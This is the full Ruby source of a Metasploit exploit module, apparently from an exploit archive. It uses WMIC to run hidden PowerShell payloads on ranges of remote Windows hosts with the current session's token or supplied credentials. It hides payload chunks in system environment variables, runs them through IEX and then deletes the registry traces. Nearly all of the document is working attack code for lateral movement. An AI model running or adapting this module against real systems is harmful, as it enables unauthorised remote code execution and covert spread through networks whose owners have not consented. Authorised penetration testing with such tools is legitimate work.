Windows Management Instrumentation (WMI) Remote Command Execution

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
require 'rex'  
  
class Metasploit3 < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Exploit::Powershell  
  
def initialize(info={})  
super( update_info( info,  
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',  
'Description' => %q{  
This module executes powershell on the remote host using the current  
user credentials or those supplied. Instead of using PSEXEC over TCP  
port 445 we use the WMIC command to start a Remote Procedure Call on  
TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel  
traffic through that session.  
  
The result is similar to psexec but with the added benefit of using  
the session's current authentication token instead of having to know  
a password or hash.  
  
We do not get feedback from the WMIC command so there are no  
indicators of success or failure. The remote host must be configured  
to allow remote Windows Management Instrumentation.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'  
],  
'References' =>  
[  
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)  
[ 'OSVDB', '3106'],  
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'WfsDelay' => '15',  
},  
'DisclosureDate' => 'Jan 01 1999',  
'Platform' => [ 'win' ],  
'SessionTypes' => [ 'meterpreter' ],  
'Targets' =>  
[  
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],  
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]  
],  
'DefaultTarget' => 0  
))  
  
register_options([  
OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),  
OptString.new('SMBPass', [ false, 'The password for the specified username' ]),  
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),  
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),  
# Move this out of advanced  
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])  
])  
end  
  
def exploit  
if datastore['SMBUser'] and datastore['SMBPass'].nil?  
fail_with(Failure::BadConfig, "Need both username and password set.")  
end  
  
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|  
# TODO: CHECK WMIC Access by reading the clipboard?  
# TODO: wmic /output:clipboard  
# TODO: Needs to be meterpreter ext side due to threading  
  
# Get the PSH Payload and split it into bitesize chunks  
# 1024 appears to be the max value allowed in env vars  
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")  
psh = psh[psh.index("$si")..psh.length-1]  
chunks = split_code(psh, 1024)  
  
begin  
print_status("[#{server}] Storing payload in environment variables")  
env_name = rand_text_alpha(rand(3)+3)  
env_vars = []  
0.upto(chunks.length-1) do |i|  
env_vars << "#{env_name}#{i}"  
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"  
wmic_command(server, c)  
end  
  
x = rand_text_alpha(rand(3)+3)  
exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"  
env_vars.each do |env|  
exec_cmd << "+$env:#{env}"  
end  
exec_cmd << ";IEX $#{x};"  
  
print_status("[#{server}] Executing payload")  
wmic_command(server, exec_cmd)  
  
print_status("[#{server}] Cleaning up environment variables")  
env_vars.each do |env|  
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"  
wmic_command(server, cleanup_cmd)  
end  
rescue Rex::Post::Meterpreter::RequestError => e  
print_error("[#{server}] Error moving on... #{e}")  
next  
ensure  
select(nil,nil,nil,2)  
end  
end  
end  
  
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])  
userpass = ""  
  
unless user.nil?  
if domain.nil?  
userpass = "/user:\"#{user}\" /password:\"#{pass}\" "  
else  
userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "  
end  
end  
  
return userpass  
end  
  
def wmic_command(server, cmd)  
wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""  
vprint_status("[#{server}] #{wcmd}")  
  
# We dont use cmd_exec as WMIC cannot be Channelized  
ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})  
select(nil,nil,nil,0.1)  
end  
  
def split_code(psh, chunk_size)  
array = []  
idx = 0  
while (idx < psh.length)  
array << psh[idx, chunk_size]  
idx += chunk_size  
end  
return array  
end  
  
end  
  
`